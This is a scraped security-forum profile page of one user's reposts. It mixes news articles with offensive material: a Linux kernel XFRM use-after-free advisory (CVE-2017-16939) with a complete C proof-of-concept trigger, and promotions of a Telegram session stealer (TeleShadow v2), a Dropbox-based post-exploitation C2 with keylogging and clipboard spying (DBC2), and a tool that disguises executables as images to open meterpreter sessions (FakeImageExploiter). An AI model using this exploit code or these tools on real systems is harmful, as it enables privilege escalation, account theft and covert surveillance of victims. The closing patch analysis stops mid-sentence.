-
Posts
3206 -
Joined
-
Days Won
87
Everything posted by Fi8sVrs
-
ai mai sus răspunsul
-
Vulnerability Summary The following advisory describes a Use-after-free vulnerability found in Linux kernel that can lead to privilege escalation. The vulnerability found in Netlink socket subsystem – XFRM. Netlink is used to transfer information between the kernel and user-space processes. It consists of a standard sockets-based interface for user space processes and an internal kernel API for kernel modules. Credit An independent security researcher, Mohamed Ghannam, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program Vendor reposnse The vulnerability has been addressed as part of 1137b5e (“ipsec: Fix aborted xfrm policy dump crash”) patch: CVE-2017-16939 @@ -1693,32 +1693,34 @@ static int dump_one_policy(struct xfrm_policy *xp, int dir, int count, void *ptr static int xfrm_dump_policy_done(struct netlink_callback *cb) { - struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1]; + struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args; struct net *net = sock_net(cb->skb->sk); xfrm_policy_walk_done(walk, net); return 0; } +static int xfrm_dump_policy_start(struct netlink_callback *cb) +{ + struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args; + + BUILD_BUG_ON(sizeof(*walk) > sizeof(cb->args)); + + xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY); + return 0; +} + static int xfrm_dump_policy(struct sk_buff *skb, struct netlink_callback *cb) { struct net *net = sock_net(skb->sk); - struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1]; + struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args; struct xfrm_dump_info info; - BUILD_BUG_ON(sizeof(struct xfrm_policy_walk) > - sizeof(cb->args) - sizeof(cb->args[0])); - info.in_skb = cb->skb; info.out_skb = skb; info.nlmsg_seq = cb->nlh->nlmsg_seq; info.nlmsg_flags = NLM_F_MULTI; - if (!cb->args[0]) { - cb->args[0] = 1; - xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY); - } - (void) xfrm_policy_walk(net, walk, dump_one_policy, &info); return skb->len; @@ -2474,6 +2476,7 @@ static const struct nla_policy xfrma_spd_policy[XFRMA_SPD_MAX+1] = { static const struct xfrm_link { int (*doit)(struct sk_buff *, struct nlmsghdr *, struct nlattr **); + int (*start)(struct netlink_callback *); int (*dump)(struct sk_buff *, struct netlink_callback *); int (*done)(struct netlink_callback *); const struct nla_policy *nla_pol; @@ -2487,6 +2490,7 @@ static const struct xfrm_link { [XFRM_MSG_NEWPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_add_policy }, [XFRM_MSG_DELPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy }, [XFRM_MSG_GETPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy, + .start = xfrm_dump_policy_start, .dump = xfrm_dump_policy, .done = xfrm_dump_policy_done }, [XFRM_MSG_ALLOCSPI - XFRM_MSG_BASE] = { .doit = xfrm_alloc_userspi }, @@ -2539,6 +2543,7 @@ static int xfrm_user_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh, { struct netlink_dump_control c = { + .start = link->start, .dump = link->dump, .done = link->done, }; Vulnerability details An unprivileged user can change Netlink socket subsystem – XFRM value sk->sk_rcvbuf (sk == struct sock object). The value can be changed into specific range via setsockopt(SO_RCVBUF). sk_rcvbuf is the total number of bytes of a buffer receiving data via recvmsg/recv/read. The sk_rcvbuf value is how many bytes the kernel should allocate for the skb (struct sk_buff objects). skb->trusize is a variable which keep track of how many bytes of memory are consumed, in order to not wasting and manage memory, the kernel can handle the skb size at run time. For example, if we allocate a large socket buffer (skb) and we only received 1-byte packet size, the kernel will adjust this by calling skb_set_owner_r. By calling skb_set_owner_r the sk->sk_rmem_alloc (refers to an atomic variable sk->sk_backlog.rmem_alloc) is modified. When we create a XFRM netlink socket, xfrm_dump_policy is called, when we close the socket xfrm_dump_policy_done is called. xfrm_dump_policy_done is called whenever cb_running for netlink_sock object is true. The xfrm_dump_policy_done tries to clean-up a xfrm walk entry which is managed by netlink_callback object. When netlink_skb_set_owner_r is called (like skb_set_owner_r) it updates the sk_rmem_alloc. netlink_dump(): In above snippet we can see that netlink_dump() check fails when sk->sk_rcvbuf is smaller than sk_rmem_alloc (notice that we can control sk->sk_rcvbuf via stockpot). When this condition fails, it jumps to the end of a function and quit with failure and the value of cb_running doesn’t changed to false. nlk->cb_running is true, thus xfrm_dump_policy_done() is being called. nlk->cb.done points to xfrm_dump_policy_done, it worth noting that this function handles a doubly linked list, so if we can tweak this vulnerability to reference a controlled buffer, we could have a read/write what/where primitive. Proof of concept The following proof of concept is for Ubuntu 17.04. #define _GNU_SOURCE #include <string.h> #include <stdio.h> #include <stdlib.h> #include <asm/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <linux/netlink.h> #include <linux/xfrm.h> #include <sched.h> #include <unistd.h> #define BUFSIZE 2048 int fd; struct sockaddr_nl addr; struct msg_policy { struct nlmsghdr msg; char buf[BUFSIZE]; }; void create_nl_socket(void) { fd = socket(PF_NETLINK,SOCK_RAW,NETLINK_XFRM); memset(&addr,0,sizeof(struct sockaddr_nl)); addr.nl_family = AF_NETLINK; addr.nl_pid = 0; /* packet goes into the kernel */ addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */ } void do_setsockopt(void) { int var =0x100; setsockopt(fd,1,SO_RCVBUF,&var,sizeof(int)); } struct msg_policy *init_policy_dump(int size) { struct msg_policy *r; r = malloc(sizeof(struct msg_policy)); if(r == NULL) { perror("malloc"); exit(-1); } memset(r,0,sizeof(struct msg_policy)); r->msg.nlmsg_len = 0x10; r->msg.nlmsg_type = XFRM_MSG_GETPOLICY; r->msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI | NLM_F_REQUEST; r->msg.nlmsg_seq = 0x1; r->msg.nlmsg_pid = 2; return r; } int send_msg(int fd,struct nlmsghdr *msg) { int err; err = sendto(fd,(void *)msg,msg->nlmsg_len,0,(struct sockaddr*)&addr,sizeof(struct sockaddr_nl)); if (err < 0) { perror("sendto"); return -1; } return 0; } void create_ns(void) { if(unshare(CLONE_NEWUSER) != 0) { perror("unshare(CLONE_NEWUSER)"); exit(1); } if(unshare(CLONE_NEWNET) != 0) { perror("unshared(CLONE_NEWUSER)"); exit(2); } } int main(int argc,char **argv) { struct msg_policy *p; create_ns(); create_nl_socket(); p = init_policy_dump(100); do_setsockopt(); send_msg(fd,&p->msg); p = init_policy_dump(1000); send_msg(fd,&p->msg); return 0; } Source: https://blogs.securiteam.com/index.php/archives/3535
- 1 reply
-
- 2
-
- 1137b5e
- cve-2017-16939
-
(and 3 more)
Tagged with:
-
net-Shield An Easy and Simple Anti-DDoS solution for VPS,Dedicated Servers and IoT devices based on iptables An Easy and Simple Anti-DDoS solution for VPS,Dedicated Servers and IoT devices based on iptables. Requirements Linux System with python, iptables Nginx (Will be installed automatically by install.sh) Quickstart Running as a standalone software (No install.sh required) via DryRun option (-dry) to only check connections agains ip/netsets and do not touch iptables firewall. python nshield-main.py -dry For complete install: cd /home/ && git clone https://github.com/fnzv/net-Shield.git && bash net-Shield/install.sh WARNING: This script will replace all your iptables rules and installs Nginx so take that into account Proxy Domains To configure proxydomains you need to enable the option on /etc/nshield/nshield.con (nshield_proxy: 1) and be sure that the proxydomain list (/etc/nshield/proxydomain ) is following this format: mysite.com 123.123.123.123 example.com 111.111.111.111 Usage The above quickstart/installation script will install python if not present and download all the repo with the example config files, after that will be executed a bash script to setup some settings and a cron that will run every 30 minutes to check connections against common ipsets. You can find example config files under examples folder. HTTPS Manually verification is executed with this command under the repository directory: python nshield-main.py -ssl The python script after reading the config will prompt you to insert an email address (For Let's Encrypt) and change your domain DNS to the nShield server for SSL DNS Challenge confirmation. Example: I Will generate SSL certs for sami.pw with Let's Encrypt DNS challenge Insert your email address? (Used for cert Expiration and Let's Encrypt TOS agreement samiii@protonmail.com Saving debug log to /var/log/letsencrypt/letsencrypt.log Renewing an existing certificate Performing the following challenges: dns-01 challenge for sami.pw ------------------------------------------------------------------------------- Please deploy a DNS TXT record under the name _acme-challenge.sami.pw with the following value: wFyeYk4yl-BERO6pKnMUA5EqwawUri5XnlD2-xjOAUk Once this is deployed, ------------------------------------------------------------------------------- Press Enter to Continue Waiting for verification... Cleaning up challenges Now your domain is verified and a SSL cert is issued to Nginx configuration and you can change your A record to this server. How it works Basically this python script is set by default to run every 30 minutes and check the config file to execute these operations: Get latest Bot,Spammers,Bad IP/Net reputation lists and blocks if those Bad guys are attacking your server (Thank you FireHol http://iplists.firehol.org/ ) Enables basic Anti-DDoS methods to deny unwanted/malicious traffic Rate limits when under attack Allows HTTP(S) Proxying to protect your site with an external proxy/server (You need to manually run SSL Verification first time) Demo https://asciinema.org/a/elow8qggzb7q6durjpbxsmk6r Download: net-Shield-master.zip Tested on Ubuntu 16.04 and 14.04 LTS Source: https://github.com/fnzv/net-Shield
-
- 1
-
- anti-ddos
- net-shield
-
(and 2 more)
Tagged with:
-
pune și report-ul https://www.virustotal.com/#/file/a04f84e48dda2639f04487f1c33c4d3e8260cd445b8099a7136bc6473da53dfa/detection https://www.hybrid-analysis.com/sample/a04f84e48dda2639f04487f1c33c4d3e8260cd445b8099a7136bc6473da53dfa?environmentId=100 pe site
- 1 reply
-
- 2
-
de ce nu incerci din .htaccess? RewriteEngine On RewriteCond %{HTTP_HOST} sub\.tachyon\.net [NC] RewriteRule ^(.*)$ https://google.com$1 [R=302]
-
TeleShadow - Frist Telegram Desktop Session Stealer [ Windows ]
Fi8sVrs replied to Fi8sVrs's topic in Programe hacking
Update TeleShadow v2 Video : https://telegram.me/parsingteam/3311 What features does it have? Support SMTP Transport! Support Telegram API Transport! Support FakeMessage! Support Custom Icon! Bypass Two-step confirmation Bypass Inherent identity and need 5-digit verification code Support for the official telegram desktop only windows ! Download:TeleShadow2-master.zip Credits and author: https://github.com/ParsingTeam/TeleShadow2#thanks-to -
Article: https://www.vulnerability-db.com/?q=articles%2F2017%2F11%2F23%2Fedward-snowden-free-speech-jbfone-data-security-privacy Press: https://www.heise.de/newsticker/meldung/Snowden-warnt-vor-Big-Data-Biometrie-und-dem-iPhone-X-3899649.html Source: VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
-
- 1
-
- jbfone
- edward snowden
-
(and 4 more)
Tagged with:
-
Earlier this month a cybersecurity researcher shared details of a security loophole with The Hacker News that affects all versions of Microsoft Office, allowing malicious actors to create and spread macro-based self-replicating malware. Macro-based self-replicating malware, which basically allows a macro to write more macros, is not new among hackers, but to prevent such threats, Microsoft has already introduced a security mechanism in MS Office that by default limits this functionality. Lino Antonio Buono, an Italian security researcher who works at InTheCyber, reported a simple technique (detailed below) that could allow anyone to bypass the security control put in place by Microsoft and create self-replicating malware hidden behind innocent-looking MS Word documents. What's Worse? Microsoft refused to consider this issue a security loophole when contacted by the researcher in October this year, saying it's a feature intended to work this way only—just like MS Office DDE feature, which is now actively being used by hackers. New 'qkG Ransomware' Found Using Same Self-Spreading Technique Interestingly, one such malware is on its way to affect you. I know, that was fast—even before its public disclosure. Just yesterday, Trend Micro published a report on a new piece of macro-based self-replicating ransomware, dubbed "qkG," which exploits exactly the same MS office feature that Buono described to our team. Trend Micro researchers spotted qkG ransomware samples on VirusTotal uploaded by someone from Vietnam, and they said this ransomware looks "more of an experimental project or a proof of concept (PoC) rather than a malware actively used in the wild." The qkG ransomware employs Auto Close VBA macro—a technique that allows executing malicious macro when victim closes the document. The latest sample of qkG ransomware now includes a Bitcoin address with a small ransom note demanding $300 in BTC as shown. It should be noted that the above-mentioned Bitcoin address hasn't received any payment yet, which apparently means that this ransomware has not yet been used to target people. Moreover, this ransomware is currently using the same hard-coded password: "I’m QkG@PTM17! by TNA@MHT-TT2" that unlocks affected files. Here's How this New Attack Technique Works In order to make us understand the complete attack technique, Buono shared a video with The Hacker News that demonstrates how an MS Word document equipped with malicious VBA code could be used to deliver a self-replicating multi-stage malware. If you are unaware, Microsoft has disabled external (or untrusted) macros by default and to restrict default programmatic access to Office VBA project object model, it also offers users to manually enable "Trust access to the VBA project object model," whenever required. With "Trust access to the VBA project object model" setting enabled, MS Office trusts all macros and automatically runs any code without showing security warning or requiring user's permission. Buono found that this setting can be enabled/disabled just by editing a Windows registry, eventually enabling the macros to write more macros without user's consent and knowledge. As shown in the video, a malicious MS Doc file created by Buono does the same—it first edits the Windows registry and then injects same macro payload (VBA code) into every doc file that the victim creates, edits or just opens on his/her system. Victims Will be Unknowingly Responsible for Spreading Malware Further In other words, if the victim mistakenly allows the malicious doc file to run macros once, his/her system would remain open to macro-based attacks. Moreover, the victim will also be unknowingly responsible for spreading the same malicious code to other users by sharing any infected office files from his/her system. This attack technique could be more worrisome when you receive a malicious doc file from a trusted contact who have already been infected with such malware, eventually turning you into its next attack vector for others. Although this technique is not being exploited in the wild, the researcher believes it could be exploited to spread dangerous self-replicating malware that could be difficult to deal with and put an end. Since this is a legitimate feature, most antivirus solutions do not flag any warning or block MS Office documents with VBA code, neither the tech company has any plans of issuing a patch that would restrict this functionality. Buono suggests "In order to (partially) mitigate the vulnerability it is possible to move the AccessVBOM registry key from the HKCU hive to the HKLM, making it editable only by the system administrator." The best way to protect yourself from such malware is always to be suspicious of any uninvited documents sent via an email and never click on links inside those documents unless adequately verifying the source. Via thehackernews.com
-
- lino antonio buono
- ms office
- (and 5 more)
-
DBC2 (DropboxC2) is a modular post-exploitation tool, composed of an agent running on the victim's machine, a controler, running on any machine, powershell modules, and Dropbox servers as a means of communication. DBC2 LAST/CURRENT VERSION: 0.2.6 Author: Arno0x0x - @Arno0x0x DBC2 (DropboxC2) is a modular post-exploitation tool, composed of an agent running on the victim's machine, a controler, running on any machine, powershell modules, and Dropbox servers as a means of communication. This project was initially inspired by the fantastic Empire framework, but also as an objective to learn Python. Check out this introduction and demo of basic functionnalities (v0.0.1) : New features in version 0.2.x : The app is distributed under the terms of the GPLv3 licence. Architecture Features DBC2 main features: Various stager (Powershell one liner, batch file, MS-Office macro, javascript, DotNetToJScript, msbuild file, SCT file, ducky, more to come...) Single CLI commands (one at a time, no environment persistency) Pseudo-interactive shell (environment persistency) - based on an idea from 0xDEADBEEF00 [at] gmail.com Send file to the agent Retrieve file from the agent Launch processes on the agent Keylogger Clipboard logger (clipboard recording/spying) Screenshot capture Run and interact with PowerShell modules (Endless capabilities: PowerSploit, Inveigh, Nishang, Empire modules, Powercat, etc.) Send key strokes to any process Set persistency through scheduled task and single instance through Mutex Can run within (w|c)script.exe thanks to the DotNetToJScript stager (javascript2) Can be injected into any process thanks to the nativeWrapper and its corresponding position independant shellcode ! Dependencies & requirements DBC2 requires a Dropbox application ("App folder" only is sufficient) to be created within your Dropbox account and an access token generated for this application, in order to be able to perform API calls. Look at the intoduction video on how to do this if you're unsure. On the controller side, DBC2 requires: Python 2.7 (not tested with Python 3) The following libraries, that can be installed using pip install -r requirements.txt: requests>=2.11 tabulate pyscrypt pycrypto DBC2 controller has been successfully tested and used on Linux Kali and Mac OSX. On the agent side, DBC2 requires: .Net framework >= 4.5 (tested sucessfully on Windows 7 and Windows 10) Security Aspects DBC2 controller asks for a master password when it starts. This password is then derived into a 128 bits master key by the use of the PBKDF function from the pyscrypt library. The master key is then base64 encoded and can (optionnally) be saved in the config file. DBC2 performs end-to-end encryption of data using the master key with AES-128/CBC mode. Data exchanged between the agent and the controller flows through the Dropbox servers so while the transfer itself is encrypted, thanks to HTTPS, data has to be end-to-end encrypted to protect the data while at rest on the Dropbox servers. DBC2 also performs obfuscation of the stages and the modules by the use of XOR encryption, which is dumb encryption but is enough to simply obfuscate some well known and publically available piece of codes. The key used to perform XOR encryption is a SHA256 hash of the master key. Installation & Configuration Installation is pretty straight forward: Git clone this repository: git clone https://github.com/Arno0x/DBC2 dbc2 cd into the DBC2 folder: cd dbc2 Install requirements using pip install -r requirements.txt Give the execution rights to the main script: chmod +x dropboxC2.py To start the controller, simply type ./dropboxC2.py. Configuration is done through the config.py file: You can optionnally specify your Dropbox API access token and base64 encoded master key. If you do so, the controller won't ask you for these when it starts. DBC2 is also available as a Docker container so it's: Check DBC2 on Docker hub. Or simply do: docker pull arno0x0x/dbc2 Compiling your own agent stage You can very easily compile your own executables of the agent stage, from the source code provided. You don't need Visual Studio installed. Copy the agent/source folder on a Windows machine with the .Net framework installed CD into the source directory Use the .Net command line C# compiler: To get the standard agent executable: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:dbc2_agent.exe *.cs To get the debug version: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /define:DEBUG /out:dbc2_agent_debug.exe *.cs DISCLAIMER This tool is intended to be used in a legal and legitimate way only: either on your own systems as a means of learning, of demonstrating what can be done and how, or testing your defense and detection mechanisms on systems you've been officially and legitimately entitled to perform some security assessments (pentest, security audits) Quoting Empire's authors: There is no way to build offensive tools useful to the legitimate infosec industry while simultaneously preventing malicious actors from abusing them. Author Arno0x0x - You can contact me on my twitter page (@Arno0x0x). TODO This is still version beta of this tool, and my first project developped with Python and C#. So it is probably full of bugs, not written in the most Pythonic of CSharp'ish way. Bugs fixes and improvements will come over time as I'll be getting feedback on this tool. To be added in the next releases: Gather basic system information for each agent at startup Create some basic event at the agent side and event subscription and automatic action on controller side (*ex: "machine locked or screensaver started" would allow for some activity that is visible like sending keystrokes to some processes, or "a given process or connection has been established") Add option for the stage to auto persist at first startup Possibility to task an agent with more than one task at a time To be fixed: Fix missing encryption on the "sendFile" function (due to me being lazy: on the agent side I wanted to leverage the WebClient->DownloadFile function and I'm not sure how to put my decryption routine in the middle of the flow without having to rewrite this function by hand). This is the only data that is not encrypted. Anything flowing from the agent back to the controller through the Dropbox servers is properly encrypted. Source: https://github.com/Arno0x/DBC2
-
Use a Fake image.jpg (hide known file extensions) to exploit targets CodeName: Metamorphosis Version release: v1.3 (Stable) Author: pedro ubuntu [ r00t-3xp10it ] Distros Supported : Linux Ubuntu, Kali, Mint, Parrot OS Suspicious-Shell-Activity (SSA) RedTeam develop @2017 Legal Disclaimer: The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law. Description: This module takes one existing image.jpg and one payload.ps1 (input by user) and builds a new payload (agent.jpg.exe) that if executed it will trigger the download of the 2 previous files stored into apache2 (image.jpg + payload.ps1) and execute them. This module also changes the agent.exe Icon to match one file.jpg Then uses the spoof 'Hide extensions for known file types' method to hidde the agent.exe extension. All payloads (user input) will be downloaded from our apache2 webserver and executed into target RAM. The only extension (payload input by user) that requires to write payload to disk are .exe binaries. Exploitation: FakeImageExploiter stores all files in apache2 webroot, zips (.zip) the agent, starts apache2 and metasploit services(handler), and provides a URL to send to target (triggers agent.zip download). As soon as the victim runs our executable, our picture will be downloaded and opened in the default picture viewer, our malicious payload will be executed, and we will get a meterpreter session. But it also stores the agent (not ziped) into FakeImageExploiter/output folder if we wish to deliver agent.jpg.exe using another diferent attack vector. 'This tool also builds a cleaner.rc file to delete payloads left in target' Payloads accepted (user input): payload.ps1 (default) | payload.bat | payload.txt | payload.exe [Metasploit] "Edit 'settings' file before runing tool to use other extensions" Pictures accepted (user input): All pictures with .jpg (default) | .jpeg | .png extensions (all sizes) "Edit 'settings' file before runing tool to use other extensions" Dependencies/Limitations: xterm, zenity, apache2, mingw32[64], ResourceHacker(wine) 'Auto-Installs ResourceHacker.exe under ../.wine/Program Files/.. directorys' WARNING: To change icon manually (resource hacker bypass) edit 'settings' file. WARNING: Only under windows systems the 2º extension will be hidden (so zip it) WARNING: The agent.jpg.exe requires the inputed files to be in apache2 (local lan hack) WARNING: The agent.jpg.exe uses the powershell interpreter (does not work againts wine). WARNING: This tool will not accept payload (user input) arguments (eg nc.exe -lvp 127.0.0.1 555) WARNING: The ResourceHacker provided by this tool requires WINE to be set to windows 7 Another senarios: If you wish to use your own binary (user input - not metasploit payloads) then: 1º - Edit 'settings' file before runing tool and select 'NON_MSF_PAYLOADS=YES' 2º - Select the binary extension to use 'Remmenber to save settings file before continue' .. 3º - Run FakeImageExploiter to metamorphosis your binary (auto-storage all files in apache) .. 4º - Open new terminal and execute your binary handler to recibe connection. HINT: This funtion will NOT build a cleaner.rc The noob friendly funtion: Bypass the need to input your payload.ps1, And let FakeImageExploiter take care of building the required payload.ps1 + agent.jpg.exe and config the handler. "With this funtion active, you only need to input your picture.jpg :D" Select the binary extension to use HINT: This funtion allow users to build (ps1|bat|txt) payloads HINT: This funtion will NOT build .exe binaries "WINE is not owned by you": If you get this message it means that you are executing FakeImageExploiter as sudo and your wine installation belongs to user (is not owned by you) to bypass this issue just execute FakeImageExploiter as the wine owner. EXAMPLE: If wine its owned by spirited_wolf, execute tool without sudo EXAMPLE: If wine its owned by root, execute tool as sudo Download/Install/Config: 1º - Download framework from github git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git 2º - Set files execution permitions cd FakeImageExploiter sudo chmod +x *.sh 3º - Config FakeImageExploiter settings nano settings 4º - Run main tool sudo ./FakeImageExploiter.sh Framework Banner settings file Agent(s) in windows systems Video tutorials: FakeImageExploiter [ Official release - Main funtions ]: FakeImageExploiter [ the noob friendly funtion ]: FakeImageExploiter [ bat payload - worddoc.docx agent ]: FakeImageExploiter [ txt payload - msfdb rebuild ]: Special thanks: @nullbyte | @Yoel_Macualo | @0xyg3n (SSA team menber) Credits: https://null-byte.wonderhowto.com/how-to/hide-virus-inside-fake-picture-0168183 Suspicious-Shell-Activity (SSA) RedTeam develop @2017 Source: https://github.com/r00t-3xp10it/FakeImageExploiter
-
- 2
-
How many times it has happened to you when you look for something online and the next moment you find its advertisement on almost every other web page or social media site you visit? Web-tracking is not new. Most of the websites log its users' online activities, but a recent study from Princeton University has suggested that hundreds of sites record your every move online, including your searches, scrolling behavior, keystrokes and every movement. Researchers from Princeton University's Centre for Information Technology Policy (CITP) analyzed the Alexa top 50,000 websites in the world and found that 482 sites, many of which are high profile, are using a new web-tracking technique to track every move of their users. Dubbed "Session Replay," the technique is used even by most popular websites, including The Guardian, Reuters, Samsung, Al-Jazeera, VK, Adobe, Microsoft, and WordPress, to record every single movement a visitor does while navigating a web page, and this incredibly extensive data is then sent off to a third party for analysis. "Session replay scripts" are usually designed to gather data regarding user engagement that can be used by website developers to improve the end-user experience. However, what's particularly concerning is that these scripts record beyond the information you purposely give to a website—which also includes the text you type out while filing a form and then delete before hitting 'Submit.' Most troubling part is that the information collected by session replay scripts cannot "reasonably be expected to be kept anonymous." Some of the companies that provide session replay software even allow website owners to explicitly link recordings to a user's real identity. Services Offering Session Replay Could Capture Your Passwords The researchers looked at some of the leading companies, including FullStory, SessionCam, Clicktale, Smartlook, UserReplay, Hotjar, and Yandex, which offer session replay software services, and found that most of these services directly exclude password input fields from recording. However, most of the times mobile-friendly login forms that use text inputs to store unmasked passwords are not redacted on the recordings, which ends up revealing your sensitive data, including passwords, credit card numbers, and even credit card security codes. This data is then shared with a third party for analysis, along with other gathered information. The researchers also shared a video which shows how much detail these session recording scripts can collect on a website's visitor. World's Top Websites Record Your Every Keystroke There are a lot of significant firms using session replay scripts even with the best of intentions, but since this data is being collected without the user's knowledge or visual indication to the user, these websites are just downplaying users' privacy. Also, there is always potential for such data to fall into the wrong hands. Besides the fact that this practice is happening without people's knowledge, the people in charge of some of the websites also did not even know that the script was implemented, which makes the matter a little scary. Companies using such software included The Guardian, Reuters, Samsung, Al-Jazeera, VK, Adobe, Microsoft, WordPress, Samsung, CBS News, the Telegraph, Reuters, and US retail giant Home Depot, among many others. So, if you are logging in one of these websites, you should expect that everything you write, type, or move is being recorded. Via thehackernews.com
-
- session replay
- website
-
(and 2 more)
Tagged with:
-
Many people realize that smartphones track their locations. But what if you actively turn off location services, haven’t used any apps, and haven’t even inserted a carrier SIM card? Even if you take all of those precautions, phones running Android software gather data about your location and send it back to Google when they’re connected to the internet, a Quartz investigation has revealed. Since the beginning of 2017, Android phones have been collecting the addresses of nearby cellular towers—even when location services are disabled—and sending that data back to Google. The result is that Google, the unit of Alphabet behind Android, has access to data about individuals’ locations and their movements that go far beyond a reasonable consumer expectation of privacy. Quartz observed the data collection occur and contacted Google, which confirmed the practice. The cell tower addresses have been included in information sent to the system Google uses to manage push notifications and messages on Android phones for the past 11 months, according to a Google spokesperson. They were never used or stored, the spokesperson said, and the company is now taking steps to end the practice after being contacted by Quartz. By the end of November, the company said, Android phones will no longer send cell-tower location data to Google, at least as part of this particular service, which consumers cannot disable. It is not clear how cell-tower addresses, transmitted as a data string that identifies a specific cell tower, could have been used to improve message delivery. But the privacy implications of the covert location-sharing practice are plain. While information about a single cell tower can only offer an approximation of where a mobile device actually is, multiple towers can be used to triangulate its location to within about a quarter-mile radius, or to a more exact pinpoint in urban areas, where cell towers are closer together. The practice is troubling for people who’d prefer they weren’t tracked, especially for those such as law-enforcement officials or victims of domestic abuse who turn off location services thinking they’re fully concealing their whereabouts. Although the data sent to Google is encrypted, it could potentially be sent to a third party if the phone had been compromised with spyware or other methods of hacking. Each phone has a unique ID number, with which the location data can be associated. The revelation comes as Google and other internet companies are under fire from lawmakers and regulators, including for the extent to which they vacuum up data about users. Such personal data, ranging from users’ political views to their purchase histories to their locations, are foundational to the business successes of companies like Facebook and Alphabet, built on targeted advertising and personalization and together valued at over $1.2 trillion by investors. The location-sharing practice does not appear to be limited to any particular type of Android phone or tablet; Google was apparently collecting cell tower data from all modern Android devices before being contacted by Quartz. A source familiar with the matter said the cell tower addresses were being sent to Google after a change in early 2017 to the Firebase Cloud Messaging service, which is owned by Google and runs on Android phones by default. Even devices that had been reset to factory default settings and apps, with location services disabled, were observed by Quartz sending nearby cell-tower addresses to Google. Devices with a cellular data or WiFi connection appear to send the data to Google each time they come within range of a new cell tower. When Android devices are connected to a WiFi network, they will send the tower addresses to Google even if they don’t have SIM cards installed. “It has pretty concerning implications,” said Bill Budington, a software engineer who works for the Electronic Frontier Foundation, a nonprofit organization that advocates for digital privacy. “You can kind of envision any number of circumstances where that could be extremely sensitive information that puts a person at risk.” The section of Google’s privacy policy that covers location sharing says the company will collect location information from devices that use its services, but does not indicate whether it will collect data from Android devices when location services are disabled: According to the Google spokesperson, the company’s system that controls its push notifications and messages is “distinctly separate from Location Services, which provide a device’s location to apps.” Android devices never offered consumers a way to opt out of the collection of cell tower data. “It is really a mystery as to why this is not optional,” said Matthew Hickey, a security expert and researcher at Hacker House, a security firm based in London. “It seems quite intrusive for Google to be collecting such information that is only relevant to carrier networks when there are no SIM card or enabled services.” While Google says it doesn’t use the location data it collects using this service, its does allow advertisers to target consumers using location data, an approach that has obvious commercial value. The company can tell using precise location tracking, for example, whether an individual with an Android phone or running Google apps has set foot in a specific store, and use that to target the advertising a user subsequently sees. Via qz.com
-
A Pretty Old Executable The recent Patch Tuesday brought, among other things, a new version of "old" Equation Editor, which introduced a fix for a buffer overflow issue reported by Embedi. The "old" Equation Editor is an ancient component of Microsoft Office (Office now uses an integrated Equation Editor), which is confirmed by looking at the properties of the unpatched EQNEDT32.EXE: We can see that File version is 2000.11.9.0 (implying being built in 2000), while Date modified is in 2003, which matches the time of its signature (signing modifies the file as the signature is attached to it.) Furthermore, the TimeDateStamp in its PE header (3A0ACEBF), which the compiler writes into the executable module when building it, indicates that the file was built on November 9, 2000 - exactly matching the date in the above version number. We're therefore safe to claim that the vulnerable EQNEDT32.EXE has been with us since 2000. That's 17 years, which is a pretty respectable life span for software! So now a vulnerability was reported in this executable and Microsoft spawned their fixing procedure: they reproduced the issue using Embedi's proof-of-concept, confirmed it, took the source code, fixed the issue in the source code, re-built EQNEDT32.EXE, and distributed the fixed version to Office users, who now see version 2017.8.14.0 under its properties. At least that's how it would work for most other vulnerabilities. But something was different here. For some reason, Microsoft didn't fix this issue in the source code - but rather by manually patching the binary executable. Manually Patching an EXE? Really, quite literally, some pretty skilled Microsoft employee or contractor reverse engineered our friend EQNEDT32.EXE, located the flawed code, and corrected it by manually overwriting existing instructions with better ones (making sure to only use the space previously occupied by original instructions). How do we know that? Well, have you ever met a C/C++ compiler that would put all functions in a 500+ KB executable on exactly the same address in the module after rebuilding a modified source code, especially when these modifications changed the amount of code in several functions? To clarify, let's look at BinDiff results between the fixed (2017.8.14.0, "primary") and vulnerable version (2000.11.9.0, "secondary") of EQNEDT32.EXE: If you're diffing binaries a lot, you'll notice something highly peculiar: All EA primary values are identical to EA secondary values of matched functions. Even the matched but obviously different functions listed at the bottom are at the same address in both EQNEDT32.EXE versions. As we already noted on Twitter, Microsoft modified five functions in EQNEDT32.EXE, namely the bottom-most five functions listed on the above image. Let's look at the most-modified one first, the one at address 4164FA. The patched version is on the left, the vulnerable one on the right. This function takes a pointer to the destination buffer and copies characters, one by one in a loop, from user-supplied string to this buffer. It is also the very function that Embedi found to be vulnerable in their research; namely, there was no check whether the destination buffer was large enough for the user-supplied string, and a too-long font name provided through the Equation object could cause a buffer overflow. Microsoft's fix introduced an additional parameter to this function, specifying the destination buffer length. The original logic of the character-copying loop was then modified so that the loop ends not only when the source string end is reached, but also when the destination buffer length is reached - preventing buffer overflow. In addition, the copied string in the destination buffer is zero-terminated after copying, in case the destination buffer length was reached (which would leave the string unterminated). Let's look at the code in its text form (again, patched function on left, vulnerable on right): As you can see, whoever patched this function not only added a check for buffer length in it, but also managed to make the function 14 bytes shorter (and padded the resulting gap before the adjacent function with 0xCC bytes for style points :). Impressive. Patching The Callers Moving on. If the patched function got an additional parameter, all those calling it would have to change as well, right? There are exactly two callers of this function, at addresses 43B418 and 4181FA, and in the patched version they both have a push instruction added before the call to specify the length of their buffers, 0x100 and 0x1F4 respectively. Now, a push instruction with a 32-bit literal operand takes 5 bytes. In order to add this instruction to these two functions while staying within the tight space of the original code (whose logic must also remain intact), the patcher did the following: For function at address 